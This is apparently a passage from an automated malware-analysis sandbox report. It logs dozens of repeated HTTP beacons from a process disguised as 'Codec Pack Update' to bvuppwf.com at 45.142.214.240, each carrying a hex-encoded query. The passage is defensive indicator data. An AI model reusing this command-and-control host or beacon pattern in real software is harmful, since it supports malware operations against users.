                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        27192.168.2.44976745.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:20.124058962 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:20.427427053 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:20 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        28192.168.2.44976845.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:20.762171030 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:21.058628082 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:20 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        29192.168.2.44976945.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:21.394081116 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:21.699054003 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:21 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        30192.168.2.44977045.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:22.033828974 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:22.338841915 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:22 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        31192.168.2.44977145.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:22.684058905 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:22.981014013 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:22 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:23.090769053 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:23.392504930 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:23 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        32192.168.2.44977245.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:23.732156038 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:24.030029058 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:23 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:24.138039112 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:24.440438032 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:24 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        33192.168.2.44977345.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:24.777762890 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:25.074517965 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:24 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:25.184508085 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:25.488177061 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:25 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        34192.168.2.44977445.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:25.828412056 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:26.128143072 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:26 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        35192.168.2.44977545.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:26.471385002 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:26.782794952 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:26 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        36192.168.2.44977645.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:27.122910023 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:27.429785967 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:27 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        37192.168.2.44977745.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:27.762065887 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:28.060153961 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:27 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:28.169307947 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:28.470686913 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:28 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        38192.168.2.44977845.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:28.814022064 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:29.115170956 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:29 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        39192.168.2.44977945.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:29.458061934 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:29.758946896 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:29 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        40192.168.2.44978045.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:30.093137980 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:30.406164885 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:30 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:30.512532949 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:30.812120914 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:30 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:30.918915987 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:31.226247072 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:31 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        41192.168.2.44978145.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:31.562211037 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:31.860681057 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:31 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        42192.168.2.44978245.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:32.211512089 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:32.516931057 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:32 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        43192.168.2.44978345.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:32.856144905 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:33.160276890 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:33 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        44192.168.2.44978445.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:33.499588966 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:33.798856020 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:33 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        45192.168.2.44978545.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:34.137988091 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:34.440857887 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:34 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
